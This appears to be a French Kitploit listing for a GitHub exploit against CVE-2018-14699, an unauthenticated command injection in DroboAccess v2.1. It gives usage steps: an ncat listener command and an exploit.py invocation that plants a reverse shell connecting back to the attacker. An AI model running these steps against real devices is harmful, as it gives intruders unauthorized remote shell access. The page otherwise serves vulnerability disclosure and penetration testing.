Skip to content
KitploitKITPLOIT
OutilsBlog
Log in
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

FluxContactConfidentialité© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2018-14699 — Injection de commande aveugle non authentifiée dans la fonction enable_user de DroboAccess v 2.1 | Kitploit
Outils/GitHubGitHub/revocain/cve-2018-14699
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et Contrôle
GitHubrevocain/cve-2018-14699

CVE-2018-14699

Injection de commande aveugle non authentifiée dans la fonction enable_user de DroboAccess v 2.1

Voir le dépôt
110il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2018-14699

Injection de commande non authentifiée dans la fonction enable_user de DroboAccess v2.1


Utilisation :

  • Pour utiliser, démarrez d'abord un listener (ncat -nvlp 1337)

  • Ensuite, exécutez l'exploit

    • exemple : exploit.py -t 192.168.1.122:8080 -l 192.168.1.2 -p 1337

    '-t', '--target', help='hôte pour l'exploitation, ex. 192.168.1.122:8080',required=True

    '-l', '--listener-ip', help='IP du listener', required=True

    '-p', '--port', help='numéro de port du listener', required=True

Description :

CVE-2018-14699 est une vulnérabilité d'injection de commande aveugle dans DroboAccess v2.1. Le problème vient du fait que la fonction enable_user prend les paramètres de nom d'utilisateur en entrée utilisateur puis appelle une dépendance qui exécute un shell directement sans aucune sanitization. Je clarifie ce point car il ne semble y avoir aucune autre référence à cela ailleurs. Encore une fois, il ne s'agit pas d'une vulnérabilité dans Drobo 5N2 mais d'une vulnérabilité dans DroboAccess. Cela a été testé avec succès sur un B810n.

Détails

Le script tentera d'écrire un script dans un fichier appelé revshell dans le répertoire de travail courant. Si cela réussit, il tentera ensuite de l'appeler avec bash comme exécutable, établissant une connexion de retour vers votre listener avec bash !

Ressources :

  • https://blog.securityevaluators.com/call-me-a-doctor-new-vulnerabilities-in-drobo5n2-4f1d885df7fc
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14699
Télécharger l’outil